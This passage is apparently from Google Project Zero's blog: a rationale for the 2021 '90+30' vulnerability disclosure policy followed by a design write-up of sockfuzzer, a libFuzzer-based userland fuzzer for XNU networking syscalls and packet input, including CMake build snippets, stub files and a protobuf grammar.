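        return deadline + adoption; /* fixed in grace: grace eats into the 30 days */
    return last_day;                /* unpatched: publish when the deadline expires */
}
```

For example, a bug fixed on Day 50 would be disclosed on Day 80, and the grace-period fix on Day 100 from the comparison above yields Day 120.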

Rationale on changes for 2021

As we discussed in last year's "Policy and Disclosure: 2020 Edition", our three vulnerability disclosure policy goals are:

  1. Faster patch development: shorten the time between a bug report and a fix being available for users.
  2. Thorough patch development: ensure that each fix is correct and comprehensive.
  3. Improved patch adoption: shorten the time between a patch being released and users installing it.

Our policy trial for 2020 aimed to balance all three of these goals, while keeping our policy consistent, simple, and fair. Vendors were given 90 days to work on the full cycle of patch development and patch adoption. The idea was that if a vendor wanted more time for users to install a patch, they would prioritize shipping the fix earlier in the 90-day cycle rather than later.

In practice however, we didn't observe a significant shift in patch development timelines, and we continued to receive feedback from vendors that they were concerned about publicly releasing technical details about vulnerabilities and exploits before most users had installed the patch. In other words, the implied timeline for patch adoption wasn't clearly understood.

The goal of our 2021 policy update is to make the patch adoption timeline an explicit part of our vulnerability disclosure policy. Vendors will now have 90 days for patch development, and an additional 30 days for patch adoption.

This 90+30 policy gives vendors more time than our current policy, as jumping straight to a 60+30 policy (or similar) would likely be too abrupt and disruptive. Our preference is to choose a starting point that can be consistently met by most vendors, and then gradually lower both patch development and patch adoption timelines.

For example, based on our current data tracking vulnerability patch times, it's likely that we can move to an "84+28" model for 2022 (having deadlines evenly divisible by 7 significantly reduces the chance our deadlines fall on a weekend). Beyond that, we will keep a close eye on the data and continue to encourage innovation and investment in bug triage, patch development, testing, and update infrastructure.
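The weekend argument is modular arithmetic: adding a whole number of weeks to a date preserves its weekday. A minimal C sketch, assuming weekdays are numbered 0 (Monday) through 6 (Sunday); the function names are illustrative:

```c
#include <stdbool.h>

/* Assumed numbering: 0 = Monday, 1 = Tuesday, ..., 6 = Sunday. */
int deadline_weekday(int report_weekday, int days_until_deadline) {
    return (report_weekday + days_until_deadline) % 7;
}

bool is_weekend(int weekday) {
    return weekday == 5 || weekday == 6; /* Saturday or Sunday */
}
```

A bug reported on a Monday with an 84-day deadline (12 weeks) comes due on a Monday, and the following 28-day (4-week) adoption period also ends on a Monday; a 90-day deadline instead lands on a Sunday, since 90 mod 7 = 6.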

Risk and benefits

Much of the debate around vulnerability disclosure is caught up on the issue of whether rapidly releasing technical details benefits attackers or defenders more. From our time in the defensive community, we've seen firsthand how the open and timely sharing of technical details helps protect users across the Internet. But we also have listened to the concerns from others around the much more visible "opportunistic" attacks that may come from quickly releasing technical details.

We continue to believe that the benefits to the defensive community of Project Zero's publications outweigh the risks of disclosure, but we're willing to incorporate feedback into our policy in the interests of getting the best possible results for user security. Security researchers need to be able to work closely with vendors and open source projects on a range of technical, process, and policy issues -- and heated discussions about the risks and benefits of technical vulnerability details or proof-of-concept exploits have been a significant roadblock.

While the 90+30 policy will be a slight regression from the perspective of rapidly releasing technical details, we're also signaling our intent to shorten our 90-day disclosure deadline in the near future. We anticipate slowly reducing time-to-patch and speeding up patch adoption over the coming years until a steady state is reached.

Finally, we understand that this change will make it more difficult for the defensive community to quickly perform their own risk assessment, prioritize patch deployment, test patch efficacy, quickly find variants, deploy available mitigations, and develop detection signatures. We're always interested in hearing about Project Zero's publications being used for defensive purposes, and we encourage users to ask their vendors/suppliers for actionable technical details to be shared in security advisories.


Moving to a "90+30" model allows us to decouple time to patch from patch adoption time, reduce the contentious debate around attacker/defender trade-offs and the sharing of technical details, while advocating to reduce the amount of time that end users are vulnerable to known attacks.

Disclosure policy is a complex topic with many trade-offs to be made, and this wasn't an easy decision to make. We are optimistic that our 2021 policy and disclosure trial lays a good foundation for the future, and has a balance of incentives that will lead to positive improvements to user security.

Designing sockfuzzer, a network syscall fuzzer for XNU

Posted by Ned Williamson, Project Zero


When I started my 20% project – an initiative where employees are allocated twenty percent of their paid work time to pursue personal projects – with Project Zero, I wanted to see if I could apply the techniques I had learned fuzzing Chrome to XNU, the kernel used in iOS and macOS. My interest was sparked after learning that some prominent members of the iOS research community believed the kernel was “fuzzed to death,” and my understanding was that most of the top researchers used auditing for vulnerability research. This meant finding new bugs with fuzzing would be meaningful in demonstrating the value of implementing newer fuzzing techniques. In this project, I pursued a somewhat unusual approach to fuzz XNU networking in userland by converting it into a library, “booting” it in userspace and using my standard fuzzing workflow to discover vulnerabilities. Somewhat surprisingly, this worked well enough to reproduce some of my peers’ recent discoveries and report some of my own, one of which was a reliable privilege escalation from the app context, CVE-2019-8605, dubbed “SockPuppet.” I’m excited to open source this fuzzing project, “sockfuzzer,” for the community to learn from and adapt. In this post, we’ll do a deep dive into its design and implementation.

Attack Surface Review and Target Planning

Choosing Networking

We’re at the beginning of a multistage project. I had enormous respect for the difficulty of the task ahead of me. I knew I would need to be careful investing time at each stage of the process, constantly looking for evidence that I needed to change direction. The first big decision was what exactly to target.

I started by downloading the XNU sources and reviewing them, looking for areas that handled a lot of attacker-controlled input and seemed amenable to fuzzing – immediately the networking subsystem jumped out as worthy of research. I had just exploited a Chrome sandbox bug that leveraged collaboration between an exploited renderer process and a server working in concert. I recognized the power of these attack surfaces, where some security-critical code is “sandwiched” between two attacker-controlled entities. The Chrome browser process is prone to use-after-free vulnerabilities due to the difficulty of managing state for large APIs, and I suspected XNU would have the same issue. Networking features both parsing and state management. I figured that even if others had already fuzzed the parsers extensively, there could still be use-after-free vulnerabilities lying dormant.

I then proceeded to look at recent bug reports. Two bugs that caught my eye: the mptcp overflow discovered by Ian Beer and the ICMP out of bounds write found by Kevin Backhouse. Both of these are somewhat “straightforward” buffer overflows. The bugs’ simplicity hinted that kernel networking, even packet parsing, was sufficiently undertested. A fuzzer combining network syscalls and arbitrary remote packets should be large enough in scope to reproduce these issues and find new ones.

Digging deeper, I wanted to understand how to reach these bugs in practice. By cross-referencing the functions and setting kernel breakpoints in a VM, I managed to get a more concrete idea. Here’s the call stack for Ian’s MPTCP bug:

The buggy function in question is mptcp_usr_connectx. Moving up the call stack, we find the connectx syscall, which we see in Ian’s original testcase. If we were to write a fuzzer to find this bug, how would we do it? Ultimately, whatever we do has to both find the bug and give us the information we need to reproduce it on the real kernel. Calling mptcp_usr_connectx directly should surely find the bug, but this seems like the wrong idea because it takes a lot of arguments. Modeling a fuzzer well enough to call this function directly in a way representative of the real code is no easier than auditing the code in the first place, so we’ve not made things any easier by writing a targeted fuzzer. It’s also wasted effort to write a target for each function this small. On the other hand, the further up the call stack we go, the more complexity we may have to support and the less chance we have of landing on the bug. If I were trying to unit test the networking stack, I would probably avoid the syscall layer and call the intermediate helper functions as a middle ground. This is exactly what I tried in the first draft of the fuzzer; I used sock_socket to create struct socket* objects to pass to connectitx in the hopes that it would be easy to reproduce this bug while being high-enough level that this bug could plausibly have been discovered without knowing where to look for it. Surprisingly, after some experimentation, it turned out to be easier to simply call the syscalls directly (via connectx). This makes it easier to translate crashing inputs into programs to run against a real kernel since testcases map 1:1 to syscalls. We’ll see more details about this later.

We can’t test networking properly without accounting for packets. In this case, data comes from the hardware, not via syscalls from a user process. We’ll have to expose this functionality to our fuzzer. To figure out how to extend our framework to support random packet delivery, we can use our next example bug. Let’s take a look at the call stack for delivering a packet to trigger the ICMP bug reported by Kevin Backhouse:

To reach the buggy function, icmp_error, the call stack is deeper, and unlike with syscalls, it’s not immediately obvious which of these functions we should call to cover the relevant code. Starting from the very top of the call stack, we see that the crash occurred in a kernel thread running the dlil_input_thread_func function. DLIL stands for Data Link Interface Layer, a reference to the OSI model’s data link layer. Moving further down the stack, we see ether_inet_input, indicating an Ethernet packet (since I tested this issue using Ethernet). We finally make it down to the IP layer, where ip_dooptions signals an icmp_error. As an attacker, we probably don’t have a lot of control over the interface a user uses to receive our input, so we can rule out some of the uppermost layers. We also don’t want to deal with threads in our fuzzer, another design tradeoff we’ll describe in more detail later. proto_input and ip_proto_input don’t do much, so I decided that ip_input was where I would inject packets, simply by calling the function when I wanted to deliver a packet. After reviewing proto_register_input, I discovered another function called ip6_input, which was the entry point for the IPv6 code. Here’s the prototype for ip_input:

void ip_input(struct mbuf *m);

Mbufs are message buffers, a standard buffer format used in network stacks. They enable multiple small packets to be chained together through a linked list. So we just need to generate mbufs with random data before calling

I was surprised by how easy it was to work with the network stack compared to the syscall interface. `ip_input` and `ip6_input` are pure functions that don’t require us to know any state to call them. But stepping back, it made more sense. Packet delivery is inherently a clean interface: our kernel has no idea what arbitrary packets may be coming in, so the interface takes a raw packet and then further down in the stack decides how to handle it. Many packets contain metadata that affect the kernel state once received. For example, TCP or UDP packets will be matched to an existing connection by their port number.
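To make the mbuf description concrete, here is a heavily simplified C sketch of turning a run of fuzzer bytes into a chain of linked buffers. The `toy_mbuf` type and its helpers are hypothetical stand-ins, not XNU’s `struct mbuf` or its allocation routines, which also carry packet headers, flags, and cluster storage; in the real harness a properly built mbuf chain is what gets handed to the packet input function.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define TOY_MBUF_DATA 16 /* deliberately tiny so that chaining is exercised */

/* Hypothetical stand-in for a message buffer; XNU's struct mbuf differs. */
struct toy_mbuf {
    struct toy_mbuf *next; /* next buffer holding more of the same packet */
    size_t len;            /* bytes used in data[] */
    uint8_t data[TOY_MBUF_DATA];
};

void toy_mbuf_free(struct toy_mbuf *m) {
    while (m != NULL) {
        struct toy_mbuf *next = m->next;
        free(m);
        m = next;
    }
}

/* Copies `size` fuzzer-provided bytes into a linked chain of buffers.
 * Returns NULL for empty input or on allocation failure. */
struct toy_mbuf *toy_mbuf_from_bytes(const uint8_t *bytes, size_t size) {
    struct toy_mbuf *head = NULL;
    struct toy_mbuf **tail = &head;
    while (size > 0) {
        struct toy_mbuf *m = calloc(1, sizeof(*m));
        if (m == NULL) {
            toy_mbuf_free(head);
            return NULL;
        }
        m->len = size < TOY_MBUF_DATA ? size : TOY_MBUF_DATA;
        memcpy(m->data, bytes, m->len);
        bytes += m->len;
        size -= m->len;
        *tail = m;
        tail = &m->next;
    }
    return head;
}

/* Total payload length across the chain. */
size_t toy_mbuf_chain_len(const struct toy_mbuf *m) {
    size_t total = 0;
    for (; m != NULL; m = m->next)
        total += m->len;
    return total;
}
```

A 40-byte input becomes three buffers holding 16, 16 and 8 bytes; the kernel code downstream walks the chain rather than assuming the packet is contiguous.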

Most modern coverage guided fuzzers, including this LibFuzzer-based project, use a design inspired by AFL. When a test case with some known coverage is mutated and the mutant produces coverage that hasn’t been seen before, the mutant is added to the current corpus of inputs. It becomes available for further mutations to produce even deeper coverage. Lcamtuf, the author of AFL, has an excellent demonstration of how this algorithm created JPEGs using coverage feedback with no well-formed starting samples. In essence, most poorly-formed inputs are rejected early. When a mutated input passes a validation check, the input is saved. Then that input can be mutated until it manages to pass the second validation check, and so on. This hill climbing algorithm has no problem generating dependent sequences of API calls, in this case to interleave syscalls with ip_input and ip6_input. Random syscalls can get the kernel into some state where it’s expecting a packet. Later, when libFuzzer guesses a packet that gets the kernel into some new state, the hill climbing algorithm will record a new test case when it sees new coverage. Dependent sequences of syscalls and packets are brute-forced in a linear fashion, one call at a time.
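The hill-climbing behavior can be demonstrated with a self-contained toy in C. This is not libFuzzer: as a simplifying assumption, “coverage” is just how many of four sequential byte checks an input passes (each check standing in for a new branch), mutation overwrites one random byte, and a mutant is saved to the corpus only when it reaches a depth no earlier input reached. All names are illustrative.

```c
#include <stdint.h>
#include <string.h>

#define INPUT_LEN 4

/* Toy target: each matching byte is one more validation check passed,
 * standing in for a newly covered branch. Returns the depth reached (0..4). */
static int target_depth(const uint8_t *in) {
    static const uint8_t magic[INPUT_LEN] = {'F', 'U', 'Z', 'Z'};
    int depth = 0;
    while (depth < INPUT_LEN && in[depth] == magic[depth])
        depth++;
    return depth;
}

/* xorshift32 PRNG with a fixed seed so runs are reproducible. */
static uint32_t rng_state = 0x12345678u;
static uint32_t next_rand(void) {
    uint32_t x = rng_state;
    x ^= x << 13;
    x ^= x >> 17;
    x ^= x << 5;
    rng_state = x;
    return x;
}

/* Coverage-guided hill climbing: mutate a corpus entry and keep the mutant
 * only if it reaches a depth never seen before. Returns the iteration at
 * which every check was passed, or -1 if max_iters ran out. */
long hill_climb(long max_iters) {
    uint8_t corpus[INPUT_LEN + 1][INPUT_LEN]; /* at most one entry per depth */
    int seen[INPUT_LEN + 1] = {0};
    uint32_t corpus_size = 1;

    memset(corpus[0], 0, INPUT_LEN); /* seed input: no well-formed sample */
    seen[target_depth(corpus[0])] = 1;

    for (long i = 1; i <= max_iters; i++) {
        uint8_t mutant[INPUT_LEN];
        memcpy(mutant, corpus[next_rand() % corpus_size], INPUT_LEN);
        uint32_t pos = next_rand() % INPUT_LEN;
        uint8_t byte = (uint8_t)(next_rand() >> 24);
        mutant[pos] = byte;

        int depth = target_depth(mutant);
        if (!seen[depth]) { /* new coverage: save the mutant for later */
            seen[depth] = 1;
            memcpy(corpus[corpus_size++], mutant, INPUT_LEN);
            if (depth == INPUT_LEN)
                return i;
        }
    }
    return -1;
}
```

Each saved input only has to be extended by one more correct byte, so the search typically needs on the order of 10^4 mutations, whereas guessing all four bytes at once with no feedback succeeds with probability 1 in 2^32 per attempt.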

Designing for (Development) Speed

Now that we know where to attack this code base, it’s a matter of building out the fuzzing research platform. I like thinking of it this way because it emphasizes that this fuzzer is a powerful assistant to a researcher, but it can’t do all the work. Like any other test framework, it empowers the researcher to make hypotheses and run experiments over code that looks buggy. For the platform to be helpful, it needs to be comfortable and fun to work with and get out of the way.

When it comes to standard practice for kernel fuzzing, there’s a pretty simple spectrum of strategies. On one end, you fuzz self-contained functions that are security-critical, e.g., OSUnserializeBinary. These are easy to write and manage and are generally quite performant. On the other end, you have “end to end” kernel testing that performs random syscalls against a real kernel instance. These heavyweight fuzzers have the advantage of producing issues that you know are actionable right away, but setup and iterative development are slower. I wanted to try a hybrid approach that could preserve some of the benefits of each style. To do so, I would port the networking stack of XNU out of the kernel and into userland while preserving as much of the original code as possible. Kernel code can be surprisingly portable and amenable to unit testing, even when run outside its natural environment.

There has been a push to add more user-mode unit testing to Linux. If you look at the documentation for Linux’s KUnit project, there’s an excellent quote from Linus Torvalds: “… a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true. That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.” This statement echoes the experience I had writing targeted fuzzers for code in Chrome’s browser process. Due to extensive unit testing, Chrome code is already well-factored for fuzzing. In a day’s work, I could go through the edit/build/run cycle for a fuzz target many times. I didn’t have a similar mechanism out of the box with XNU. In order to perform a unit test, I would need to rebuild the kernel. And despite XNU being considerably smaller than Chrome, incremental builds were slower due to the older kmk build system. I wanted to try bridging this gap for XNU.

Setting up the Scaffolding

“Unit” testing a kernel up through the syscall layer sounds like a big task, but it’s easier than you’d expect if you forgo some complexity. We’ll start by building all of the individual kernel object files from source using the original build flags. But instead of linking everything together to produce the final kernel binary, we link in only the subset of objects containing code in our target attack surface. We then stub or fake the rest of the functionality. Thanks to the recon in the previous section, we already know which functions we want to call from our fuzzer. I used that information to prepare a minimal list of source objects to include in our userland port.

Before we dive in, let’s define the overall structure of the project as pictured below. There’s going to be a fuzz target implemented in C++ that translates fuzzed inputs into interactions with the userland XNU library. The target code, libxnu, exposes a few wrapper symbols for syscalls and ip_input as mentioned in the attack surface review section. The fuzz target also exposes its random sequence of bytes to kernel APIs such as copyin or copyout, whose implementations have been replaced with fakes that use fuzzed input data.
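Conceptually, a fake copyin turns “copy bytes from user memory” into “take the next bytes of fuzzer input.” A minimal C sketch under stated assumptions: `fake_copyin`, `fuzz_set_input`, and the global input buffer are hypothetical names, `user_addr_t` is assumed to be a 64-bit integer, and the user address is ignored because the userland port has no separate user address space. It is not the project’s actual implementation.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef uint64_t user_addr_t; /* assumption: 64-bit user addresses */

/* Hypothetical fuzzer-owned input stream shared with the fakes. */
static const uint8_t *fuzz_data;
static size_t fuzz_data_len;

void fuzz_set_input(const uint8_t *data, size_t len) {
    fuzz_data = data;
    fuzz_data_len = len;
}

/* Fake copyin: rather than reading user memory at uaddr, give the kernel
 * code the next len bytes of fuzzer input. Once the input runs out, fail
 * the way a bad user pointer would. */
int fake_copyin(user_addr_t uaddr, void *kaddr, size_t len) {
    (void)uaddr; /* there is no separate user address space in userland */
    if (len == 0)
        return 0;
    if (len > fuzz_data_len)
        return EFAULT;
    memcpy(kaddr, fuzz_data, len);
    fuzz_data += len;
    fuzz_data_len -= len;
    return 0;
}
```

Failing with an error instead of inventing bytes keeps each test case deterministic: the same fuzzer input always produces the same sequence of copyin results.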

To make development more manageable, I decided to create a new build system using CMake, as it supported Ninja for fast rebuilds. One drawback here is the original build system has to be run every time upstream is updated to deal with generated sources, but this is worth it to get a faster development loop. I captured all of the compiler invocations during a normal kernel build and used those to reconstruct the flags passed to build the various kernel subsystems. Here’s what that first pass looks like:





    # ...

    # ...

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)
add_executable(net_fuzzer fuzz/ ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})
target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)
target_compile_options(net_fuzzer PRIVATE ${FUZZER_CXX_FLAGS})

Of course, without the rest of the kernel, we see tons of missing symbols.

  "_zdestroy", referenced from:
      _if_clone_detach in libxnu.a(if.c.o)
  "_zfree", referenced from:
      _kqueue_destroy in libxnu.a(kern_event.c.o)
      _knote_free in libxnu.a(kern_event.c.o)
      _kqworkloop_get_or_create in libxnu.a(kern_event.c.o)
      _kev_delete in libxnu.a(kern_event.c.o)
      _pipepair_alloc in libxnu.a(sys_pipe.c.o)
      _pipepair_destroy_pipe in libxnu.a(sys_pipe.c.o)
      _so_cache_timer in libxnu.a(uipc_socket.c.o)
  "_zinit", referenced from:
      _knote_init in libxnu.a(kern_event.c.o)
      _kern_event_init in libxnu.a(kern_event.c.o)
      _pipeinit in libxnu.a(sys_pipe.c.o)
      _socketinit in libxnu.a(uipc_socket.c.o)
      _unp_init in libxnu.a(uipc_usrreq.c.o)
      _cfil_init in libxnu.a(content_filter.c.o)
      _tcp_init in libxnu.a(tcp_subr.c.o)
  "_zone_change", referenced from:
      _knote_init in libxnu.a(kern_event.c.o)
      _kern_event_init in libxnu.a(kern_event.c.o)
      _socketinit in libxnu.a(uipc_socket.c.o)
      _cfil_init in libxnu.a(content_filter.c.o)
      _tcp_init in libxnu.a(tcp_subr.c.o)
      _ifa_init in libxnu.a(if.c.o)
      _if_clone_attach in libxnu.a(if.c.o)
ld: symbol(s) not found for architecture x86_64
clang: error: linker command failed with exit code 1 (use -v to see invocation)
ninja: build stopped: subcommand failed.

To get our initial targeted fuzzer working, we can do a simple trick by linking against a file containing stubbed implementations of all of these. We take advantage of C’s weak type system here: C symbol names carry no type information, so the linker resolves each call against a stub regardless of its signature. For each function we need to implement, we can link an implementation void func() { assert(false); }. The arguments passed to the function are simply ignored, and a crash will occur whenever the target code attempts to call it. This goal could also be achieved with linker flags, but this was a simple enough solution, and it gave me nice backtraces when I hit an unimplemented function.

// Unimplemented stub functions
// These should be replaced with real or mock impls.
#include <kern/assert.h>
#include <stdbool.h>

int printf(const char* format, ...);

void Assert(const char* file, int line, const char* expression) {
  printf("%s: assert failed on line %d: %s\n", file, line, expression);
  __builtin_trap();  // crash so the fuzzer reports a backtrace
}

void IOBSDGetPlatformUUID() { assert(false); }
void IOMapperInsertPage() { assert(false); }
// ...

Then we just link this file into the XNU library we’re building by adding it to the source list:

    # ...

As you can see, there are some other files I included in the XNU library that represent faked implementations and helper code to expose some internal kernel APIs. To make sure our fuzz target will call code in the linked library, and not some other host functions (syscalls) with a clashing name, we hide all of the symbols in libxnu by default and then expose a set of wrappers that call those functions on our behalf. I hide all the names by default using a CMake setting set_target_properties(xnu PROPERTIES C_VISIBILITY_PRESET hidden). Then we can link in a file (fuzz/syscall_wrappers.c) containing wrappers like the following:

__attribute__((visibility("default"))) int accept_wrapper(int s, caddr_t name,
                                                          socklen_t* anamelen,
                                                          int* retval) {
  // Pack the arguments the way the syscall dispatcher would.
  struct accept_args uap = {
      .s = s,
      .name = name,
      .anamelen = anamelen,
  };
  return accept(kernproc, &uap, retval);
}

Note the visibility attribute that explicitly exports the symbol from the library. Due to the simplicity of these wrappers I created a script to automate this called using syscalls.master.
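Because every wrapper follows the same pattern, generating them is mechanical. As a hypothetical illustration (not the script used in the project), the C function below turns a simplified syscalls.master-style entry into the exported wrapper’s prototype. It assumes the plain `{ type name(params); }` form only, and a complete generator would also have to emit the body that fills in the matching `*_args` structure.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical generator: given an entry such as
 *   30 AUE_ACCEPT ALL { int accept(int s, caddr_t name, socklen_t *anamelen); }
 * writes the prototype of an exported wrapper that also takes int* retval.
 * Returns 0 on success, -1 if the line is not in the expected shape. */
int make_wrapper_proto(const char *line, char *out, size_t out_len) {
    const char *brace = strchr(line, '{');
    const char *lparen = brace ? strchr(brace, '(') : NULL;
    const char *rparen = lparen ? strchr(lparen, ')') : NULL;
    if (rparen == NULL)
        return -1;

    /* Text between '{' and '(' is "<return type> <name>". The return type
     * is parsed but unused: wrappers return the kernel's int error code. */
    char decl[128], ret_type[64], name[64];
    size_t n = (size_t)(lparen - brace - 1);
    if (n >= sizeof decl)
        return -1;
    memcpy(decl, brace + 1, n);
    decl[n] = '\0';
    if (sscanf(decl, "%63s %63s", ret_type, name) != 2)
        return -1;

    /* Copy the parameter list without its parentheses. */
    char params[256];
    n = (size_t)(rparen - lparen - 1);
    if (n >= sizeof params)
        return -1;
    memcpy(params, lparen + 1, n);
    params[n] = '\0';
    int no_params = (n == 0 || strcmp(params, "void") == 0);

    int written = snprintf(out, out_len,
        "__attribute__((visibility(\"default\"))) int %s_wrapper(%s%sint* retval)",
        name, no_params ? "" : params, no_params ? "" : ", ");
    return (written < 0 || (size_t)written >= out_len) ? -1 : 0;
}
```

For the accept entry above, this produces the same prototype as the hand-written accept_wrapper; a syscall declared with (void) gets a wrapper taking only retval.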

With the stubs in place, we can start writing a fuzz target now and come back to deal with implementing them later. We will see a crash every time the target code attempts to use one of the functions we initially left out. Then we get to decide to either include the real implementation (and perhaps recursively require even more stubbed function implementations) or to fake the functionality.
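As an example of the “fake it” option, the zone allocator functions from the linker errors could be backed by the host’s malloc. The sketch below is hypothetical: `fake_zone`, `fake_zinit`, `fake_zalloc`, `fake_zfree`, and `fake_zdestroy` use simplified signatures chosen for this illustration, not XNU’s real zinit/zalloc/zfree/zdestroy prototypes, which vary between releases.

```c
#include <assert.h>
#include <stdlib.h>

/* Hypothetical, simplified zone: a real zone hands out fixed-size elements
 * from dedicated memory; here each element is a separate heap block. */
struct fake_zone {
    size_t elem_size;
    const char *name;
    size_t live; /* outstanding allocations, useful for leak checks */
};

struct fake_zone *fake_zinit(size_t elem_size, const char *name) {
    struct fake_zone *z = calloc(1, sizeof(*z));
    if (z != NULL) {
        z->elem_size = elem_size;
        z->name = name;
    }
    return z;
}

void *fake_zalloc(struct fake_zone *z) {
    void *p = calloc(1, z->elem_size); /* zeroed: a choice for this sketch */
    if (p != NULL)
        z->live++;
    return p;
}

void fake_zfree(struct fake_zone *z, void *elem) {
    assert(z->live > 0); /* freeing more than was allocated is a bug */
    z->live--;
    free(elem);
}

void fake_zdestroy(struct fake_zone *z) {
    assert(z->live == 0); /* destroying a zone with live elements is a bug */
    free(z);
}
```

One reason to prefer plain heap allocations here is that AddressSanitizer instruments malloc and free, so a use-after-free of a zone element is reported immediately instead of being masked by an allocator that recycles freed elements.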

A bonus of getting a build working with CMake was to create multiple targets with different instrumentation. Doing so allows me to generate coverage reports using clang-coverage:

target_compile_options(xnu-cov PRIVATE ${XNU_C_FLAGS} -DLIBXNU_BUILD=1 -D_FORTIFY_SOURCE=0 -fprofile-instr-generate -fcoverage-mapping)

With that, we just add a fuzz target file and a protobuf file to use with protobuf-mutator and we’re ready to get started:

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)
add_executable(net_fuzzer fuzz/ ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})
target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)
target_compile_options(net_fuzzer
                       PRIVATE -g
                       # ...
                       )
if(APPLE)
  target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES})
else()
  target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES} pthread)
endif()


Writing a Fuzz Target

At this point, we’ve assembled a chunk of XNU into a convenient library, but we still need to interact with it by writing a fuzz target. At first, I thought I might write many targets for different features, but I decided to write one monolithic target for this project. I’m sure fine-grained targets could do a better job for functionality that’s harder to fuzz, e.g., the TCP state machine, but we will stick to one for simplicity.

We’ll start by specifying an input grammar using protobuf, part of which is depicted below. This grammar is completely arbitrary and will be used by a corresponding C++ harness that we will write next. LibFuzzer has a plugin called libprotobuf-mutator that knows how to mutate protobuf messages. This will enable us to do grammar-based mutational fuzzing efficiently, while still leveraging coverage guided feedback. This is a very powerful combination.

message Socket {
  required Domain domain = 1;
  required SoType so_type = 2;
  required Protocol protocol = 3;
  // TODO: options, e.g. SO_ACCEPTCONN
}

message Close {
  required FileDescriptor fd = 1;
}

message SetSocketOpt {
  optional Protocol level = 1;
  optional SocketOptName name = 2;
  // TODO(nedwill): structure for val
  optional bytes val = 3;

  optional FileDescriptor fd =